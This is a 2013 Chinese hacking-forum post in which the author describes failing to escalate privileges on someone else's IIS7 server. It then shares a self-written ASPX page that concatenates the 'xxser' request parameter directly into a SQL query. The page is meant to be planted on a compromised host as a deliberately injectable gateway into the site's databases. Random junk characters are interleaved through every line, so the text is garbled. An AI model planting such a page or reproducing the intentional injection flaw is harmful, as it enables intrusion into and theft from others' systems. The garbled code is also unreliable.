昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。 h+ m+ d# y5 c( P- X
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。 I6 ^" d6 h& d/ t4 H) e0 I% n: J
代码量不多,自己写个拉倒了。烦死了。$ o$ L& b" k# R3 h4 h! X6 b
" Q. l1 B9 k0 C8 m3 I( z
* ?* D4 j6 X) Z( u1 O; E<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ~! v% X+ W; t9 v/ G
<html xmlns="http://www.w3.org/1999/xhtml">. G1 W( |- m2 o o S
<head runat="server">. S' K; e1 o3 i4 e
<title>暗影aspx构造注射专用页面</title>) }* J4 W& J2 [0 Z6 y9 K h1 Z: I
</head>- u! q* j3 v3 ~5 p2 }% E4 y
<body>
2 l G- L8 O3 L <form id="form1" runat="server">0 l# E* ?$ g3 [* M2 B- f2 a. e
<div>
! Z" h% m# G. K* J4 z# p <script language="c#" runat="server">
( ^) [& N. T5 [1 b4 z
- M; O0 }( t2 v- k* O, f" s8 V0 f. y void page_init(object sender, EventArgs e)7 h; E% u E: `" m6 F, \$ e
{
+ A; M9 O- c) g5 X! n : {2 U1 B& O5 D$ d$ G9 g
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
: {2 h; i* A+ H 2 E& K& } o: ?$ {- u( R" Y# a
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
% e1 I. F1 r7 p3 o conn.Open();+ l+ T/ f4 g6 I1 c# ?8 I! F
' h- a. F( _; x- r9 Q! y, M0 W5 k string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
( R- ~* r( t/ n9 v' K % Q. {* ], i8 ^: S; R
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
; N' J. w9 r, ^2 ~ int x = command.ExecuteNonQuery();* x2 ]4 X1 L8 ^$ t" h) F7 M( K
Response.Write(i+"\n");
+ {% A3 ?3 O/ C0 W0 C Response.Write(x);
- i3 r# i6 f4 A conn.Close();7 T# T4 v( l; {: G$ p
}* z$ j7 a; k7 A5 f; A x
8 c9 Z4 @) W# Z+ u2 {$ U* H
</script>
( H; @9 s0 @- L# w5 G Z5 y </div>
8 i- M- [& Y3 ^& O0 z. v6 y </form>! t/ J6 E8 q5 J1 m, y
</body>" ~' |. m6 r7 `6 b5 p
</html>
2 F4 T6 B# {. j* O. c& o: Y6 t: H |
发表于 2013-3-20 21:32:01
收藏
支持
反对